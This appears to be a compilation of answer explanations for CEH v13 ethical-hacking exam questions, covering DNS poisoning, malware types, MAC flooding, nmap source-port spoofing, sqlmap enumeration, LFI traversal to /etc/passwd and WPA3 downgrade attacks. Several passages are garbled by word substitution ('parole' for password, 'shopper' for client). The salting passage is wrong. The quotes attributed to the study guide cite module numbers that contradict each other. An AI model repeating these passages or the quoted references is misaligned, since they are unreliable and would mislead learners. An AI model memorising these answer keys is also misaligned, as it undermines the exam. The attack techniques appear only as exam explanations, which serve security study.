From CEH v13 Official Courseware:

Module 3: Scanning Networks

Topic: DNS Enumeration & Poisoning

CEH v13 Study Guide states:

“The SOA record includes a minimum TTL value that dictates how long DNS information should be cached by other DNS servers. If DNS cache poisoning occurs, the false information will persist until the TTL expires.”

Incorrect Options:

A: MX (Mail Exchange) defines mail servers, not TTLs.

C: NS (Name Server) specifies authoritative servers, not caching durations.

D: TIMEOUT is not a valid DNS resource record.

A Boot Sector Virus infects the master boot record (MBR) of the system. When a system boots, it first loads the MBR into memory. A Boot Sector Virus takes advantage of this by moving the original MBR to a different location on the hard disk and writing itself to the original MBR location. This ensures that it is executed first during system startup.

As per CEH v13 course material:

“A boot sector virus infects the master boot record of a hard disk. It moves the original boot sector to a different location on the hard disk and replaces it with its own malicious code. When the computer is booted, the virus loads first and then hands control to the original boot sector code.”

Reference – CEH v13 Study Guide:

Module 06: Malware Threats, Section: “Types of Malware”, Subsection: “Boot Sector Viruses”

Incorrect Options Explained:

A: Describes directory virus behavior, not boot sector.

B: The virus moves MBR on the hard disk, not RAM.

D: Some viruses overwrite MBR, but most preserve the original and move it to another disk location to maintain system operability.

CEH v13 explains that multi-vector DDoS attacks, especially those combining volumetric reflection (DNS amplification) with application-layer exhaustion (Slowloris), require multi-layered mitigation. Standard firewalls and IPS devices cannot handle large-scale distributed attacks without causing collateral damage to legitimate traffic. CEH emphasizes the need for hybrid DDoS protection, combining on-premises appliances for real-time local filtering with cloud-based scrubbing centers capable of absorbing massive volumetric floods. Cloud scrubbing removes malicious traffic upstream, while on-prem devices mitigate application-layer anomalies. Increasing bandwidth (Option A) is ineffective against reflection attacks. IPS (Option B) cannot handle Slowloris-style partial requests at scale. Blocking all external DNS/HTTP (Option C) would deny service to legitimate users. The correct CEH-aligned solution is hybrid DDoS mitigation services.

The Heartbleed vulnerability (CVE-2014-0160) is a critical buffer over-read flaw in OpenSSL’s implementation of the TLS heartbeat extension. It allows attackers to read portions of memory from a server using vulnerable versions of OpenSSL.

This exposed sensitive data including:

Usernames and passwords

Session tokens

Private encryption keys

From CEH v13 Study Guide – Module 5: Vulnerability Analysis and Module 6: Malware Threats:

“The Heartbleed vulnerability allowed attackers to extract memory contents from the OpenSSL process, including sensitive materials such as private SSL keys. These private keys are used in the TLS protocol to encrypt and decrypt secure communications. Once compromised, attackers could decrypt communications or impersonate the server.”

Private keys being compromised allow attackers to decrypt HTTPS traffic, impersonate trusted servers, and conduct MITM (Man-in-the-Middle) attacks.

Incorrect Options:

A. Public: Public keys are already shared and not a security risk if disclosed.

C. Shared: Vague term not applicable here.

D. Root: Heartbleed doesn’t directly expose root keys; rather, it leaks application memory including private SSL/TLS keys.

Ettercap is a comprehensive MITM attack tool that supports live traffic interception and content injection. It can modify HTTP streams in real time and inject malicious payloads, such as JavaScript or applets, into web traffic.

Reference – CEH v13 Official Study Guide:

Module 8: Sniffing

Quote:

“Ettercap allows attackers to intercept, analyze, and alter data on the fly, including injecting malicious content like Java applets in HTTP sessions during MITM attacks.”

Incorrect Options Explained:

A & D. Wireshark and Tcpdump are passive sniffers with no injection capability.

C. Aircrack-ng is for Wi-Fi key cracking, not traffic manipulation.

===========

In authentication, Multi-Factor Authentication (MFA) involves using more than one category of authentication factors:

Something you know (e.g., password)

Something you have (e.g., RFID badge, token)

Something you are (e.g., biometrics like fingerprints, facial recognition, gait)

In this scenario:

The RFID badge is "something you have" (a physical object).

The gait recognition (walking pattern) captured by the camera is a biometric—"something you are" (a physical characteristic).

Together, these two methods represent two distinct authentication factors, thereby implementing true multi-factor authentication.

Reference – CEH v13 Official Study Guide:

Module 5: System Hacking

Topic: Authentication Mechanisms

Quote:

“Examples of multi-factor authentication include combining biometrics (something you are) with a smart card or badge (something you have). Gait recognition is considered a behavioral biometric and falls under ‘something you are’.”

Incorrect Options Explained:

A. Incorrect — gait and RFID represent two separate factor types, not one.

C. No evidence in the scenario supports high false positives.

D. Gait analysis is a recognized biometric method and can be used for identification.

The TCP three-way handshake is the foundational mechanism used to establish a reliable connection between two devices. The sequence is as follows:

The client sends a SYN (synchronize) packet to the server to initiate the connection.

The server replies with a SYN-ACK (synchronize-acknowledge) packet.

The client sends an ACK (acknowledge) packet back to the server.

Therefore, the connection starts with a SYN packet from the client.

In CEH v13 Module 13: Hacking Web Applications, Server-Side Includes (SSI) is defined as a method for dynamically generating web content through directives embedded in HTML files.

stm File Extension:

Associated with Server Side Includes (SSI).

Files like .stm, .shtml, and .shtm can embed server-side directives.

Vulnerable if user input is improperly handled, allowing command injection or arbitrary file access.

Option Clarification:

A. .stm: Correct – indicates SSI is enabled.

B. .html: Static file, not associated with SSI.

C. .rss: XML feed; irrelevant to SSI.

D. .cms: Generic; doesn’t indicate SSI functionality.

MAC flooding is a Layer 2 attack in which an attacker sends a large number of fake MAC addresses to a switch, filling up its CAM (Content Addressable Memory) table. Once the table is full:

The switch enters “fail-open” mode and broadcasts traffic to all ports

The attacker can then sniff sensitive traffic

This attack effectively turns a switch into a hub, facilitating data sniffing.

Incorrect Options:

A. Evil twin is a wireless attack using rogue access points.

B. DNS cache flooding corrupts DNS entries, unrelated to Ethernet.

D. DDoS attacks are about overwhelming systems/services, not Layer 2 memory overflows.

Reference – CEH v13 Official Courseware:

Module 11: Sniffing

Section: “Switch Port Stealing and MAC Flooding”

Subsection: “Layer 2 Attacks and CAM Table Poisoning”

===========

Passwords are usually delineated as “hashed and salted”. salting is simply the addition of a unique, random string of characters renowned solely to the site to every parole before it’s hashed, typically this “salt” is placed in front of each password.

The salt value needs to be hold on by the site, which means typically sites use the same salt for each parole. This makes it less effective than if individual salts are used.

The use of unique salts means that common passwords shared by multiple users – like “123456” or “password” – aren’t revealed revealed when one such hashed password is known – because despite the passwords being the same the immediately and hashed values are not.

Large salts also protect against certain methods of attack on hashes, including rainbow tables or logs of hashed passwords previously broken.

Both hashing and salting may be repeated more than once to increase the issue in breaking the security.

flags –source-port and -g are equivalent and instruct nmap to send packets through a selected port. this option is used to try to cheat firewalls whitelisting traffic from specific ports. the following example can scan the target from the port twenty to ports eighty, 22, 21,23 and 25 sending fragmented packets to LinuxHint.

A sheep dip computer is a dedicated device that is used to test inbound files or physical media for viruses, malware, or other harmful content, before they are allowed to be used with other computers. The term sheep dip comes from a method of preventing the spread of parasites in a flock of sheep by dipping the new animals that farmers are adding to the flock in a trough of pesticide. A sheep dip computer is isolated from the organization’s network and has port monitors, file monitors, network monitors, and antivirus software installed. Before initiating the analysis of a potentially malicious program, the analyst should store the program on an external medium, such as a CD-ROM, and then insert it into the sheep dip computer. This way, the analyst can prevent the program from infecting other devices or spreading over the network, and can safely analyze its behavior and characteristics.

The other options are not correct steps to take before initiating the analysis. Running the potentially malicious program on the sheep dip computer may cause irreversible damage to the device or compromise its security. Connecting the sheep dip computer to the organization’s internal network may expose the network to the risk of infection or attack. Installing the potentially malicious program on the sheep dip computer may not be possible or advisable, as the program may require certain dependencies or permissions that the sheep dip computer does not have or allow. 

A TCP/IP hijack is an attack that spoofs a server into thinking it’s talking with a sound client, once actually it’s communication with an assaulter that has condemned (or hijacked) the tcp session. Assume that the client has administrator-level privileges, which the attacker needs to steal that authority so as to form a brand new account with root-level access of the server to be used afterward. A tcp Hijacking is sort of a two-phased man-in-the-middle attack. The man-in-the-middle assaulter lurks within the circuit between a shopper and a server so as to work out what port and sequence numbers are being employed for the conversation.

First, the attacker knocks out the client with an attack, like Ping of Death, or ties it up with some reasonably ICMP storm. This renders the client unable to transmit any packets to the server. Then, with the client crashed, the attacker assumes the client’s identity so as to talk with the server. By this suggests, the attacker gains administrator-level access to the server.

One of the most effective means of preventing a hijack attack is to want a secret, that’s a shared secret between the shopper and also the server. looking on the strength of security desired, the key may be used for random exchanges. this is often once a client and server periodically challenge each other, or it will occur with each exchange, like Kerberos.

CEH notes that cloud IAM misconfigurations can unintentionally grant broad access. If any authenticated cloud account is permitted read/write access, attackers can simply authenticate with their own cloud identity and directly interact with the misconfigured storage buckets, enabling data exfiltration or manipulation.

18 U.S.C. §1030, also known as the Computer Fraud and Abuse Act (CFAA), is a broad federal statute that criminalizes unauthorized access to computers and related fraudulent activities—including phishing and email scams.

From CEH v13 Official Courseware:

Module 1: Introduction to Ethical Hacking

Topic: U.S. Laws Related to Cybercrime

CEH v13 Study Guide states:

“Email-based frauds such as phishing, spoofing, and other social engineering attacks fall under the Computer Fraud and Abuse Act (18 U.S.C. §1030), which criminalizes unauthorized access and fraudulent behavior in computing systems.”

Incorrect Options:

B: Relates to credit cards and access devices.

C: Covers interference with government communication systems.

D: Covers illegal wiretapping and eavesdropping.

This falls under Requirement 8 of PCI DSS: "Identify and authenticate access to system components," which supports the objective of implementing strong access control measures.

CEH v13 Reference:

Module 20: Hacking Mobile Platforms and IoT – Compliance Standards

"PCI DSS requires unique identification for each person with access to ensure accountability and access control."

Docker uses a client-server design. The docker client talks to the docker daemon, that will the work of building, running, and distributing your docker containers. The docker client and daemon will run on the same system, otherwise you will connect a docker consumer to a remote docker daemon. The docker consumer and daemon communicate using a REST API, over OS sockets or a network interface.

The docker daemon (dockerd) listens for docker API requests and manages docker objects like pictures, containers, networks, and volumes. A daemon may communicate with other daemons to manage docker services.

Operation Cloud Hopper was an in depth attack and theft of data in 2017 directed at MSP within the uk (U.K.), us (U.S.), Japan, Canada, Brazil, France, Switzerland, Norway, Finland, Sweden, South Africa , India, Thailand, South Korea and Australia. The group used MSP as intermediaries to accumulate assets and trade secrets from MSP client engineering, MSP industrial manufacturing, retail, energy, pharmaceuticals, telecommunications, and government agencies.

Operation Cloud Hopper used over 70 variants of backdoors, malware and trojans. These were delivered through spear-phishing emails. The attacks scheduled tasks or leveraged services/utilities to continue Microsoft Windows systems albeit the pc system was rebooted. It installed malware and hacking tools to access systems and steal data.

The given rule syntax is consistent with Snort, a popular open-source Intrusion Detection System (IDS). This rule alerts when any TCP traffic from any source IP and port is sent to IPs within the 192.168.100.0/24 subnet on port 21 (FTP), triggering the alert message: “FTP on the network!”

The Snort rule format is:

alert protocol source_IP source_port -> destination_IP destination_port (rule_options)

CEH v13 course materials teach this rule format under IDS/IPS configuration.

From CEH v13 Guide:

“Snort rules are used in IDS/IPS to define suspicious traffic patterns. An example rule: alert tcp any any -> 192.168.1.0/24 21 (msg: 'FTP detected') triggers an alert on FTP traffic within a subnet.”

Incorrect Options:

A/C. IP tables are used in firewalls and routers but follow a completely different syntax.

B. FTP servers do not use such alerting rules.

Reference – CEH v13 Study Guide:

Module 12: Evading IDS, Firewalls, and Honeypots

Section: Snort IDS Configuration

===========

https://en.wikipedia.org/wiki/Network_Time_Protocol

The Network Time Protocol (NTP) is a networking protocol for clock synchronization between computer systems over packet-switched, variable-latency data networks.

NTP is intended to synchronize all participating computers within a few milliseconds of Coordinated Universal Time (UTC). It uses the intersection algorithm, a modified version of Marzullo's algorithm, to select accurate time servers and is designed to mitigate variable network latency effects. NTP can usually maintain time to within tens of milliseconds over the public Internet and achieve better than one millisecond accuracy in local area networks. Asymmetric routes and network congestion can cause errors of 100 ms or more.

The protocol is usually described in terms of a client-server model but can easily be used in peer-to-peer relationships where both peers consider the other to be a potential time source. Implementations send and receive timestamps using the User Datagram Protocol (UDP) on port number 123.

Dynamic ARP inspection (DAI) protects switching devices against Address Resolution Protocol (ARP) packet spoofing (also known as ARP poisoning or ARP cache poisoning).

DAI inspects ARPs on the LAN and uses the information in the DHCP snooping database on the switch to validate ARP packets and to protect against ARP spoofing. ARP requests and replies are compared against entries in the DHCP snooping database, and filtering decisions are made based on the results of those comparisons. When an attacker tries to use a forged ARP packet to spoof an address, the switch compares the address with entries in the database. If the media access control (MAC) address or IP address in the ARP packet does not match a valid entry in the DHCP snooping database, the packet is dropped.

Digital signatures are designed to provide two key guarantees:

Authenticity – confirming the identity of the sender.

Unforgeability – ensuring that no one else can produce the same signature without the sender’s private key.

These properties are achieved using a combination of hash functions and asymmetric encryption (digital certificates/private keys).

Reference – CEH v13 Official Study Guide:

Module 20: Cryptography

Quote:

“A valid digital signature ensures that the message comes from a legitimate sender (authenticity) and has not been altered or forged (unforgeability).”

Incorrect Options:

A, C, D: Refer to human/visual signatures, not cryptographic properties

===========

The ntpq utility provides detailed NTP peer information, synchronization states, offsets, delays, and strata. CEH specifically lists ntpq as the tool for querying NTP daemon status and enumerating peer relationships, making it essential for reconnaissance and lateral movement mapping.

The main purpose of a rootkit is to hide malicious activity by modifying or replacing legitimate system binaries (e.g., ls, ps, netstat) so they no longer show the presence of malicious files, users, or processes. This enables attackers to maintain persistent and stealthy access.

From CEH v13 Official Courseware:

Module 6: Malware Threats → Rootkits

CEH v13 Study Guide states:

“Rootkits are stealthy programs designed to conceal the existence of other malicious processes or programs by replacing legitimate operating system utilities and binaries. This makes detection and removal extremely difficult.”

Incorrect Options:

A: This is a backdoor’s behavior.

B: A buffer overflow is a method of exploitation, not the rootkit’s purpose.

D: Refers to a backdoor or vulnerability, not a rootkit’s core function.

To ensure both confidentiality and non-repudiation for secure email communication, you need to use a combination of symmetric and asymmetric cryptography. Symmetric encryption is a method of encrypting and decrypting data using the same secret key, which is faster and more efficient than asymmetric encryption. Asymmetric encryption is a method of encrypting and decrypting data using a pair of keys: a public key and a private key, which are mathematically related but not identical. Asymmetric encryption can provide authentication, integrity, and non-repudiation, as well as key distribution.

The cryptographic technique that would best serve the purpose is to apply asymmetric encryption with RSA and use the private key for signing. RSA is a widely used algorithm for asymmetric encryption, which is based on the difficulty of factoring large numbers. RSA can be used to encrypt data, as well as to generate digital signatures, which are a way of proving the identity and authenticity of the sender and the integrity of the message.

The steps to implement this technique are as follows1:

Generate a pair of keys for each user: a public key and a private key. The public key can be shared with anyone, while the private key must be kept secret and protected by the user.

When a user wants to send an email to another user, they first encrypt the email content with a symmetric key, such as AES, which is a strong and efficient algorithm for symmetric encryption. The symmetric key is then encrypted with the recipient’s public key, using RSA. The encrypted email and the encrypted symmetric key are then sent to the recipient.

The sender also generates a digital signature for the email, using their private key and a hash function, such as SHA-256, which is a secure and widely used algorithm for generating hashes. A hash function is a mathematical function that takes any input and produces a fixed-length output, called a hash or a digest, that uniquely represents the input. A digital signature is a hash of the email that is encrypted with the sender’s private key, using RSA. The digital signature is then attached to the email and sent to the recipient.

When the recipient receives the email, they first decrypt the symmetric key with their private key, using RSA. They then use the symmetric key to decrypt the email content, using AES. They also verify the digital signature by decrypting it with the sender’s public key, using RSA, and comparing the resulting hash with the hash of the email, using the same hash function. If the hashes match, it means that the email is authentic and has not been tampered with.

Using this technique, the email communication is secure because:

The confidentiality of the email content is ensured by the symmetric encryption with AES, which is hard to break without knowing the symmetric key.

The symmetric key is also protected by the asymmetric encryption with RSA, which is hard to break without knowing the recipient’s private key.

The non-repudiation of the email is ensured by the digital signature with RSA, which is hard to forge without knowing the sender’s private key.

The digital signature also provides authentication and integrity of the email, as it proves that the email was sent by the sender and has not been altered in transit.

CEH v13 highlights the importance of route tracing during internal reconnaissance to identify key infrastructure devices such as distribution switches, firewalls, and core routers. When a single IP address consistently appears as the penultimate hop across multiple network paths, this typically indicates that the device serves as a core router responsible for inter-VLAN or inter-subnet routing. Core routers aggregate traffic from various segments before forwarding to endpoint subnets, explaining why it appears before diverse destinations. CEH emphasizes recognizing core infrastructure because compromising such devices provides attackers with significant visibility and potential control over network-wide communications. DNS poisoning would affect name resolution, not hop patterns. Loopback misconfigurations would affect single hosts, not multiple segments. A transparent proxy would appear only for traffic routed through application-layer inspection, not all traceroute tests. The consistency across subnets strongly points to a centralized routing device.

A NULL scan is a type of TCP stealth scan where no flags are set in the TCP header. It is used to identify open or closed ports based on how the target responds to this unexpected packet.

Behavior:

If the port is closed → Target responds with RST (Reset)

If the port is open → No response (on compliant systems like Unix-based OSes)

From CEH v13 Courseware:

Module 03: Scanning Networks

Topic: TCP Flag Scanning

Subsection: NULL Scan

CEH v13 Study Guide states:

“In a NULL scan, if a target port is closed, the system responds with an RST packet as per RFC 793. If the port is open, it typically does not respond, which allows stealthy enumeration of services.”

Incorrect Options:

A. SYN: Initiated by a SYN scan.

B. ACK: Used in ACK scans.

C/D: Not applicable for NULL scans.

F. No response occurs for open ports, not closed ones.

The best practice to meet the client’s requirement is to encrypt data client-side before uploading to the cloud and retain control of the encryption keys. This practice is also known as client-side encryption or end-to-end encryption, and it involves encrypting the data on the client’s device using a software or hardware tool that generates and manages the encryption keys. The encrypted data is then uploaded to the cloud service, where it remains encrypted at rest. The encryption keys are never shared with the cloud service provider or any third party, and they are only used by the client to decrypt the data when needed. This way, the client can maintain full control over the encryption keys and the security of the data, even when the data is stored on a public cloud service12.

The other options are not as optimal as option D for the following reasons:

A. Use the cloud service provider’s encryption services but store keys on-premises: This option is not feasible because it contradicts the client’s requirement of maintaining full control over the encryption keys. Using the cloud service provider’s encryption services means that the client has to rely on the cloud service provider to generate and manage the encryption keys, even if the keys are stored on-premises. The cloud service provider may have access to the keys or the ability to decrypt the data, which may compromise the security and privacy of the data. Moreover, storing the keys on-premises may introduce additional challenges, such as key distribution, synchronization, backup, and recovery3.

B. Use the cloud service provider’s default encryption and key management services: This option is not desirable because it violates the client’s requirement of maintaining full control over the encryption keys. Using the cloud service provider’s default encryption and key management services means that the client has to trust the cloud service provider to encrypt and decrypt the data on the server-side, using the cloud service provider’s own encryption keys and mechanisms. The cloud service provider may have access to the keys or the ability to decrypt the data, which may compromise the security and privacy of the data. Furthermore, the cloud service provider’s default encryption and key management services may not meet the regulatory requirements or the security standards of the client4.

C. Rely on Secure Sockets Layer (SSL) encryption for data at rest: This option is not sufficient because SSL encryption is not designed for data at rest, but for data in transit. SSL encryption is a protocol that encrypts the data as it travels over the internet between the client and the server, using certificates and keys that are exchanged and verified by both parties. SSL encryption can protect the data from being intercepted or modified by unauthorized parties, but it does not protect the data from being accessed or decrypted by the cloud service provider or any third party who has access to the server. Moreover, SSL encryption does not provide the client with any control over the encryption keys or the security of the data.

The command uses sqlmap, a powerful SQL injection and database penetration testing tool. The flag -u specifies the target URL, and -dbs instructs sqlmap to enumerate the available databases on the DBMS behind that URL.

Command Breakdown:

-u: Target URL with injectable parameters

-dbs: Retrieve and enumerate all available database names

This is a common first step in identifying vulnerable DBMS structures after confirming SQL injection.

Incorrect Options:

A. Backdoor creation is not the default function of sqlmap.

C. Retrieving SQL statements would require additional options like --trace or --sql-query.

D. Option D is not technically accurate—sqlmap is used for injection and enumeration, not searching statements.

Reference – CEH v13 Official Courseware:

Module 14: Hacking Web Applications

Section: “SQL Injection Tools and Automation”

Tool Reference: sqlmap usage and options

===========

Wired Equivalent Privacy (WEP) may be a security protocol, laid out in the IEEE wireless local area network (Wi-Fi) standard, 802.11b, that’s designed to supply a wireless local area network (WLAN) with A level of security and privacy like what’s usually expected of a wired LAN. A wired local area network (LAN) is usually protected by physical security mechanisms (controlled access to a building, for example) that are effective for a controlled physical environment, but could also be ineffective for WLANs because radio waves aren’t necessarily bound by the walls containing the network. WEP seeks to determine similar protection thereto offered by the wired network’s physical security measures by encrypting data transmitted over the WLAN. encoding protects the vulnerable wireless link between clients and access points; once this measure has been taken, other typical LAN security mechanisms like password protection, end-to-end encryption, virtual private networks (VPNs), and authentication are often put in situ to make sure privacy.

A research group from the University of California at Berkeley recently published a report citing “major security flaws” in WEP that left WLANs using the protocol susceptible to attacks (called wireless equivalent privacy attacks). within the course of the group’s examination of the technology, they were ready to intercept and modify transmissions and gain access to restricted networks. The Wireless Ethernet Compatibility Alliance (WECA) claims that WEP – which is included in many networking products – was never intended to be the only security mechanism for a WLAN, and that, in conjunction with traditional security practices, it’s very effective.

Adversaries could decide to build an possible or file difficult to find or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. this is often common behavior which will be used across totally different platforms and therefore the network to evade defenses.

Payloads may be compressed, archived, or encrypted so as to avoid detection. These payloads may be used throughout Initial Access or later to mitigate detection. typically a user’s action could also be needed to open and Deobfuscate/Decode Files or info for User Execution. The user can also be needed to input a parole to open a parole protected compressed/encrypted file that was provided by the mortal. Adversaries can also used compressed or archived scripts, like JavaScript.

Portions of files can even be encoded to cover the plain-text strings that will otherwise facilitate defenders with discovery. Payloads can also be split into separate, ostensibly benign files that solely reveal malicious practicality once reassembled.

Adversaries can also modify commands dead from payloads or directly via a Command and Scripting Interpreter. surroundings variables, aliases, characters, and different platform/language specific linguistics may be wont to evade signature based mostly detections and application management mechanisms.

In CEH v13 Module 03: Scanning Networks, Nmap includes timing templates for controlling the speed and stealthiness of scans.

-T5: Insane mode – very fast, highly aggressive, easily detectable.

-T0: Paranoid mode – very slow and stealthy.

-O: Enables OS detection (not related to scan speed).

-A: Enables OS detection, version detection, script scanning, and traceroute (comprehensive but not specifically about speed).

Therefore:

If speed is your goal and you are not concerned about detection, then:

-T5 is the correct answer.

Web server footprinting is part of the reconnaissance phase in ethical hacking. It involves gathering detailed information about a web server’s structure, external links, available directories, scripts, and technologies in use.

Techniques include:

Spidering the site to map all accessible URLs and file paths

Identifying hidden directories or backup files

Analyzing page structures and URL patterns

This information helps attackers identify areas to target for further scanning or exploitation.

Incorrect Options:

A. Vulnerability scanning is active testing, not passive footprinting.

C. System-level data is gathered in OS or network footprinting.

D. Brute-force attacks are exploitation techniques, not reconnaissance.

Reference – CEH v13 Official Courseware:

Module 02: Footprinting and Reconnaissance

Section: “Web Server Footprinting Techniques”

Tool Reference: HTTrack, Burp Spider, OWASP ZAP

===========

Tess King is attempting to gather all DNS records from a target zone. This process is referred to as a zone transfer (AXFR), which is typically performed by secondary name servers to synchronize DNS data with the primary. If improperly secured, attackers can initiate unauthorized zone transfers to enumerate valuable information such as:

Hostnames

IP addresses

Mail servers

Name servers

CEH v13 defines a zone transfer as a crucial step in DNS enumeration.

From CEH v13 Official Courseware:

Module 3: Scanning Networks

Topic: DNS Enumeration → Zone Transfers

CEH v13 Study Guide states:

“A zone transfer (AXFR) is a DNS transaction used to replicate DNS databases. Attackers can exploit this feature to extract all DNS information from an improperly secured server.”

Incorrect Options:

A. Zone harvesting is not a formal term.

C. Zone update refers to DNS dynamic update operations (e.g., DDNS).

D. Zone estimate is not a DNS-related process.

A powerful and often the most effective cryptanalysis method in which the attack is directed at the most vulnerable link in the cryptosystem - the person. In this attack, the cryptanalyst uses blackmail, threats, torture, extortion, bribery, etc. This method's main advantage is the decryption time's fundamental independence from the volume of secret information, the length of the key, and the cipher's mathematical strength.

The method can reduce the time to guess a password, for example, for AES, to an acceptable level; however, it requires special authorization from the relevant regulatory authorities. Therefore, it is outside the scope of this course and is not considered in its practical part.

The CEH v13 content explains that stealth scanning involves modifying scan timing parameters to reduce packet frequency, randomize intervals, and avoid recognizable patterns typically flagged by intrusion detection systems. Slow, randomized timing—often achieved with Nmap’s T0 or T1 timing templates—prevents bursts of traffic and allows scans to blend into normal network noise. IDS/IPS systems tuned for high-volume events may fail to detect such gradual reconnaissance. Fast SYN scans generate distinctive patterns easily identified by security monitoring tools. UDP scans, especially across all ports, produce high traffic volume and are extremely noisy. Xmas scans, although sometimes used for stealth against stateless filters, are still signature-detectable and inappropriate when stealth over time is required. Therefore, applying slow, randomized timing options aligns with CEH-approved reconnaissance techniques for evading detection while enumerating open ports.

Local File Inclusion vulnerabilities arise when a web application incorporates user-supplied input into file-handling functions without proper sanitization. CEH courseware emphasizes that attackers can leverage directory traversal sequences (such as ../../) to escape the intended directory structure and access sensitive local files. An LFI payload commonly targets system files like /etc/passwd on Linux to extract user information or escalate the attack further.

CEH v13 explains that WPA3 introduces SAE (Simultaneous Authentication of Equals), which resists traditional offline dictionary and brute-force attacks by removing crackable handshake material. Because WPA3 prevents attackers from capturing a reusable handshake, the most practical offensive method is to force a downgrade attack, tricking clients into associating using WPA2 instead of WPA3. Once the victim reconnects under WPA2-PSK, the attacker captures the standard 4-way handshake, which can then be cracked offline using dictionary or GPU-accelerated brute-force methods. CEH discusses downgrade attacks as a significant real-world threat when mixed-mode configurations are enabled or when access points fail to enforce strict WPA3-only operation. Options B and C are ineffective because WPA3 handshake materials cannot be brute-forced offline. Option D is unrelated to Wi-Fi encryption. Downgrading to WPA2 is the most effective and widely documented attack path.

Ethical hacking, as defined throughout CEH courseware, is the authorized and legitimate process of identifying vulnerabilities, weaknesses, and misconfigurations in information systems. The primary objective is to strengthen security by discovering issues before malicious actors can exploit them. Ethical hackers follow strict legal guidelines, obtain written permission, and operate within a defined scope to ensure their activities contribute positively to the organization’s security posture. Unlike malicious hacking, the intent is not to steal data, cause harm, or disrupt operations. Ethical hackers use the same tools, techniques, and methodologies that attackers use, but with the purpose of remediation and risk reduction. CEH emphasizes that ethical hacking supports defense-in-depth strategies by enabling organizations to harden their environments and proactively mitigate threats. Therefore, identifying and fixing vulnerabilities is the central mission of ethical hacking.

https://en.wikipedia.org/wiki/Bluejacking

Bluejacking is the sending of unsolicited messages over Bluetooth to Bluetooth-enabled devices such as mobile phones, PDAs or laptop computers, sending a vCard which typically contains a message in the name field (i.e., for bluedating or bluechat) to another Bluetooth-enabled device via the OBEX protocol.

Bluejacking is usually harmless, but because bluejacked people generally don't know what has happened, they may think that their phone is malfunctioning. Usually, a bluejacker will only send a text message, but with modern phones it's possible to send images or sounds as well. Bluejacking has been used in guerrilla marketing campaigns to promote advergames.

Bluejacking is also confused with Bluesnarfing, which is the way in which mobile phones are illegally hacked via Bluetooth.

In CEH v13 Module 05: System Hacking, and Module 14: Access Control, Identity Management, and Cryptography, Single Sign-On (SSO) is defined as a system that allows users to authenticate once and gain access to multiple systems without re-entering credentials.

SSO uses a Central Authentication Server (CAS).

Common technologies: Kerberos, OAuth, SAML, AD Federation Services.

Improves user convenience and centralized credential management.

Web Server Attacks - DNS Server Hijacking Attacker compromises the DNS server and changes the DNS settings so that all the requests coming towards the target web server are redirected to his/her own malicious server. (P.1623/1607)